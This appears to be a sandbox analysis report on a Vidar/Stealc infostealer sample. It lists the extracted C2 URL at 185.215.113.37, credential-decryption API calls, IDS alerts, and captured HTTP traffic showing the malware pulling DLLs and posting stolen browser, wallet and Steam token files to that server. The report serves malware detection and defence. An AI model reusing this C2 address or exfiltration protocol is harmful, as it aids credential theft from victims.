Source: 0.2.file.exe.970000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00979B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00979B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0097C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00979AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00979AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00977240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00977240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00988EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00988EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C5D6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 38 37 35 46 32 42 32 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="hwid"D9D875F2B2153256450765------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build"doma------KJKKJKEHDBGIDGDHCFHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="message"browsers------IDAEHCFHJJJJECAAFBKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 2d 2d 0d 0a Data Ascii: ------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="message"plugins------CFIIIJJKJKFHIDGDBAKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="message"fplugins------ECGHJJEHDHCAAKFIIDGI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 185.215.113.37Content-Length: 6067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="file"------HCFIIIJJKJKFHIDGDBAK--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wallets------DGIJEGHDAECAKECAFCAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 2d 2d 0d 0a Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="file"------DHJJEGHIIDAFIDHJDHJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="message"ybncbhylepme------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJJKFBGCFHCGDHIDAAEC--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
